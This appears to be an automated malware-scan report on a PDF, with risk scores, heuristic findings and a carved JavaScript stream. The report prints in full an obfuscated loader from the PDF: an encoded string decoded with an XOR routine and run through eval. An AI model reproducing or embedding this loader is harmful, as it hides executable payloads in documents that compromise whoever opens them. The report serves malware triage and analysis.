MALICIOUS
166
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
function NY8GXXSRWf() {var datfield = 'g'+'tUpnm'+'aqc5MaCmzSgs7Z'+'mmzrn8UpU'+'Wz@V_LZih'+'IpD6'+'Iytm'+'aI34wZIVIp6'+'5ojA4'+'ck'+'Otu'+'qu1CI_y'+'PxgyupYWOqCWUZOh7jP'+'_a6gQPWP@7ZgyLq'+'m'+'6VIZ4A6tx'+'7Zt'+'COqO'+'5'+'LYz'+'yupYWOq'+'C'+'W'+'UZOh7jPobqm'+'6VIZ4A6'+'g'+'ozSgtuqu1'+'CI_yu3HmLqm6VIZ'+'4A'+'6'+'gSAf_CU0pKM'+'N7haji8'+'IjD8'+'UWtCO@'+'vxB61lQWD0O62Wcy'+'dMLYPoA'+'fn1Oqi8by'+'gtuqu1CI_yu3gSPfE1by1KUW'+'4hOfJMw0_nujUKO0OJBfVmLqF8Pft3O51C'+'QfH_BY7mr'+'pv9O'+'Y1mrpV'+'_LqF8Pf'+'vKwZ … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0014_001.js |
pdf-javascript-stream | PDF /JS object 14 at offset 0x485 | 5738 bytes |
SHA-256: cb1f8da65a946692253d4c80a4fe976484414c9507bb857a9add311de779acbf |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 eval/decoder/string-building token(s). 155 of 232 identifiers look randomly generated (e.g. 'm9eYx1zqntoYnRzq_twN31zq_EeNdRzqm_eYf1'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function NY8GXXSRWf() {var datfield = 'g'+'tUpnm'+'aqc5MaCmzSgs7Z'+'mmzrn8UpU'+'Wz@V_LZih'+'IpD6'+'Iytm'+'aI34wZIVIp6'+'5ojA4'+'ck'+'Otu'+'qu1CI_y'+'PxgyupYWOqCWUZOh7jP'+'_a6gQPWP@7ZgyLq'+'m'+'6VIZ4A6tx'+'7Zt'+'COqO'+'5'+'LYz'+'yupYWOq'+'C'+'W'+'UZOh7jPobqm'+'6VIZ4A6'+'g'+'ozSgtuqu1'+'CI_yu3HmLqm6VIZ'+'4A'+'6'+'gSAf_CU0pKM'+'N7haji8'+'IjD8'+'UWtCO@'+'vxB61lQWD0O62Wcy'+'dMLYPoA'+'fn1Oqi8by'+'gtuqu1CI_yu3gSPfE1by1KUW'+'4hOfJMw0_nujUKO0OJBfVmLqF8Pft3O51C'+'QfH_BY7mr'+'pv9O'+'Y1mrpV'+'_LqF8Pf'+'vKwZMlUjlocp9mV5gSAfih7ZlV7pv1O@RRzqD9ANlR'+'zq'+'D9ANl'+'RzqD9ANlRzqvt9a'+'S1zql9HNS1zq_'+'tr'+'rU'+'R'+'zq7_erURzq7_AYdRz'+'qf'+'4'+'oYlRzq'+'f8ANl'+'Rzqf8w'+'aY1zqfWAYi'+'Rzqx49a31zq'+'x'+'4wax1zq7To'+'Nx1'+'zqX4QNf1zqf49ax1z'+'q_EHax1zqfVHrx1z'+'qUtwNDRzqDTealR'+'z'+'qUtwNDR'+'zq_R9am'+'Rzq'+'f4QYlRzqf'+'49aS1z'+'q_'+'EHax'+'1zqS6'+'AYlRzq_nA3mRzq'+'flH'+'rd'+'RzqvQAYlRzqf49YdRz'+'q'+'f49ax1zqYl'+'wN'+'_RzqS6HaS1zqmQA3'+'mRzq_RHYdR'+'zqvQHad'+'Rzqf49'+'Yx1zqf49ax1zqYlwN_RzqS6H'+'a'+'m'+'Rzq3lQ3m'+'Rz'+'q'+'d'+'_HNx1zq'+'vQeYX1'+'zq'+'f4QYX1'+'zqf49'+'ax'+'1zqYlwN_RzqS'+'6HalRzqv_A3mRzqvtwYdRzq'+'v'+'Q'+'A3x1'+'zqf4oYS1zqf49ax1zq'+'YlwN_'+'RzqS6eax1zq'+'nRQ3mRzqvn93_RzqvQH'+'NmR'+'zqf4w'+'YURzqf49ax1zqYlw'+'N_Rz'+'qY4waS1zq'+'XCeNx1'+'zqUnwY31zq_tHYiRzq'+'xCHrY1zqfWAY_Rzqf49af1zqS'+'lHax1zq'+'UnwN_Rzq_Er'+'rS'+'1zq'+'f89'+'rY1'+'zqf1Q3iRzq'+'_Eer_Rzqx'+'CerY1zqv'+'QerURzqf4wNDRzqf49ax1'+'zq7Q'+'e'+'r'+'x1zqx1Aa'+'URzqUtor'+'vR'+'zqmyAY'+'mRz'+'qf49ax1zq_tHax1zqxVH'+'r'+'Y1'+'zqnnw'+'NDRzqntwN31zq_ter'+'x1z'+'q349rY1zqd_A'+'3mRz'+'qf'+'49ax'+'1zqS49'+'ax1z'+'qYl'+'wNDRzq7ReaS1zqS4HaX1zqSlw'+'NDRzqvQe'+'amRzqf4Q3f1'+'zqf49a'+'x1zqYl'+'9a31zqn'+'yrr'+'x1zqSVHax1z'+'q3lH3dRzqn'+'yA3Y1zqf'+'89rx1zq7n93mRzqf49ax'+'1zqUn'+'9YvRzq'+'_'+'Errx1zqfVHrY1zqf1Q3iR'+'zq_Eer_RzqxCerY'+'1zqY4QYmRzqf49ax1'+'zq7RHax1zq'+'SC'+'Ha'+'7RzqY'+'l9a31zqXVorS1'+'zq'+'SVoYD'+'Rzq'+'d_er31zq3493Y'+'1zqSVwrx1z'+'qYl'+'wNDR'+'zq7R'+'e'+'alRzqS4HaY1zqSlwNDRzqvQ'+'eamRz'+'qf4or31zq'+'f49ax1zq'+'f4Q3iRzqUn9Y'+'vRzq_'+'Errx1zqf'+'C'+'HrY1'+'zqfKQ3'+'iRzq_Eer_R'+'zqxCerY'+'1zqx4QYmRzqf49'+'ax'+'1'+'zq7R'+'Ha'+'x1zq_EHYvRzqx49rY1zqf1Q3iRzq_Eer'+'_Rz'+'qxCer'+'Y1zqf4QYmRzqf49ax1zqY19ax1zqSK'+'wrDRzqvR9a31'+'zqvR9a31zqvR'+'9'+'a31zqvR9a31zqv9eN31z'+'qS1HaS1zq_E'+'er31zqvEoYiRzqSK9Y7Rzq'+'vt'+'9YvRz'+'q_EerY1zq_EAYlRzqfCH'+'3nRzqS8eNDR'+'zqS'+'6Ha'+'lRzqU9wNDRz'+'q_'+'EAalRzqxlH3S1z'+'qf'+'V93m'+'RzqS6HY31zqUJeNDRz'+'qfV'+'orx1z'+'qXV9Y31zq'+'Y'+'4eY_RzqDTHrf1zqn99a31zqX'+'VwrU'+'RzqfmHYURzqx49NdRzqdEQa'+'iRz'+'qfCH3'+'S1'+'zqnneYf1zqfV9anRzqY4'+'9YX1z'+'qdRQ'+'YDRzqdn'+'AaDRzqUn'+'wrdRzqS1'+'AYY1zqvEeNDRzqS1eNDR'+'zqfVor'+'S1z'+'q7JrYn'+'RzqfVeND'+'Rzq_EHrDRzqxVer'+'iRzqlT'+'Ha31zq'+'f8wND'+'Rzq'+'fVwNDRzqS'+'l'+'eYY1zqnE'+'wrnRzqf4'+'9a'+'mRzqdTQY'+'mRzqd_HYdRzqSl9YvR'+'z'+'qYVerX1'+'zqYmHrn'+'Rzqf49rdR'+'zqmEeN'+'7Rzqm_r'+'NDRzq'+'nto'+'YY'+'1zqmQeYx1z'+'q_tw'+'Nx1zq'+'_neNlRzq'+'_JrNlRzq_tw'+'Nf1zq_9eY'+'f1zq_Ew'+'Nx1zq'+'m9eYx1zqntoYnRzq_twN31zq_EeNdRzqm_eYf1'+'zqm_eN7Rzq_JrYx'+'1'+'zql'+'EwNDRzqlyrYiRzqntrY'+'mRz'+'qm_rNlRzql'+'EwN31zqv_rYDTz@V_LqF8Pfq6HaEKwY7m'+'PfH_BY7KAYv'+'_AYvoAf_lcjgQ9'+'0'+'yhojeK9'+'qm_PqWm'+'zSg_P'+'aE'+'09jdVrWR'+'5PubhBy2hIZDWO'+'fQ_LY'+'V_'+'LqF'+'8Pf7V7'+'rO'+'Ku'+'W71OWtlPfH_B'+'uUR'+'wZX8A6vmzxgyaau'+'4Mkl3QaiCAjDC0@'+'vyuY7Ja3gtUpnmLq'+'m6'+'VIZ4'+'A6gSAfih7ZlV7pv1O@'+'RRz'+'qU_H3v'+'RzqU_H'+'3'+'vTz@V_Lqm6'+'VIZ4A6gS'+'AfWVw'+'aEW0p1'+'VM5l3'+'cZsWL'+'qm6VIZ4A6B_B61lQWD0O62Wcyd6a3gtUpnma'+'aA3Q6j8'+'w5_VP'+'Zi'+'_zSgyLy'+'AWop@'+'mzxg_A6D_AYv_AYPwBuURwZX8A'+'6v0AfEM'+'cj'+'gyL'+'qF'+'8PfC4oa'+'2'+'M7k'+'y3A'+'YVoca@1Iye4CS'+'@37k'+'7lM'+'rw4ujG1r'+'3C4o'+'a2M7ky0a@P_'+'a6gQP5o4oW00ca@1Iye'+'4VogSAf_C'+'U0pKM'+'N7'+'ma@g_PaE09jdVrWR5Pub'+'0AfHmzJgt7qt'+'VOqPMcyg'+'QP5UQQ3j6bZO'+'J'+'BfVmLqF8Pf'+'mWV5oVCuh@QfH_zpvmbx'+'_'+'67Z'+'m1cjy1cjl6IythBq4VCqn6cy'+'KWz@V_aqI'+'6w06m0'+'kLmzSgQP0b50uqMQktTUZv@7p11'+'O@4xCa4QOx'+'RTz@V_LqF8'+'Pfm'+'VHW'+'l5PYiJw'+'NmmzSgs7Zmmzrn8'+'UpUWaqI6w06m'+'0kLha'+'pOlcjYKP@vJBx'+'mWV5o'+'V'+'Cuh@wx1W7pnlQ'+'qOnH@BQP0'+'b50uqMQkt'+'9OWF8UrDWLYPJa3gJcZgyB@m'+'VHWl5PYiJwNm0CYrmzSH'+'_'+'B3gtLXgyB@m'+'V'+'HWl5PY'+'iJwN'+'m0VY'+'rmzS'+'H_zYgtL'+'XgQuYPVb6'+'vRH5_Qu0'+'nSCfz_L'+'YP_BJzmaq'+'lJI'+'j9mH'+'Nb4rq'+'0lHo'+'gxA'+'f'+'d'+'Jz@gxPJgyaqlJIj9'+'mH'+'Nb'+'4rq'+'0'+'mHo'+'gSHSgQAfEt'+'BfmVHWl5PYiJwNm0'+'VYrmBSgnH@gxP'+'Jgya'+'qlJIj9mHNb'+'4r'+'q0mHogxAfmJz@go'+'PfJMw0_nu'+'jUKO0OJa'+'3gt'+'Upnmapitwu34'+'CfH_zqt1I'+'j'+'1lOj2'+'WLf2'+'RPY'+'1mrp2RPY1m'+'r'+'pR'+'Ja'+'3gQPWP@7Z'+'O97Nx80ryhBy2hIZDWOfz'+'_BN'+'DJHNnJBf11eaJVw'+'Igo'+'zSg97Nx80r'+'y0AfDW7Wlhap4@OyF8IuDMcj2mzSg9o'+'yB@7pRhap'+'4'+'@'+'Oy2V'+'Oqf3'+'7pP@'+'75t4IyOouji8cW9_Lf'+'Rxzyl'+'C'+'c3'+'g97N'+'x80ry3U'+'@V_z'+'Jg'+'SPfm'+'W93@WHuU'+'4O'+'@P'+'oA'; function qDZqlsPDH(IDLcwDc6Hv){ var tp = '63@7@1@39@11@59@55@28@27@30@0@0@0@0@0@0@35@9@8@15@16@2@5@0@25@60@54@3@40@47@36@12@13@14@6@38@26@29@31@51@32@37@48@0@0@0@0@18@0@56@45@44@21@41@33@4@43@17@53@58@23@19@22@62@49@52@57@42@10@61@20@46@34@50@24'; var xQofzLkeJKWpxJ=0, grKI7lV=IDLcwDc6Hv.length, T08XixJa=1024, HsB87Wj4kL, gGJH9, xFO6shEzFx='', fYJ6RVCX3w=xQofzLkeJKWpxJ, oHjpY37hfgw5=xQofzLkeJKWpxJ, sl2o2ykZW5eya=xQofzLkeJKWpxJ, Scn8P6qEet=Array(); Scn8P6qEet = tp.split('@'); for(eval('gGJH9=Ma'+'th.'+'ce'+'il(grKI7lV'+'/T08XixJa)');gGJH9>xQofzLkeJKWpxJ;gGJH9--){ for(eval('HsB87Wj4kL=M'+'ath'+'.m'+'in(grKI7lV,'+'T08XixJa)');HsB87Wj4kL>xQofzLkeJKWpxJ;HsB87Wj4kL--,grKI7lV--){ eval('sl2o2ykZW5eya|'+'=(Scn8P6qEet['+'IDLcwDc6Hv.'+'cha'+'rCo'+'de'+'At(fYJ6RVCX3w+'+'+)-48])<'+'<oHjpY37hfgw5'); if(oHjpY37hfgw5){ eval('xFO6shEzFx+'+'=S'+'tri'+'ng['+'"fro'+'mCha'+'rCod'+'e"](164^'+'sl2o2ykZW5eya&'+'25'+'5)'); sl2o2ykZW5eya>>=8; oHjpY37hfgw5-=2; } else { oHjpY37hfgw5=6; } } } eval(xFO6shEzFx); } qDZqlsPDH(datfield);}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.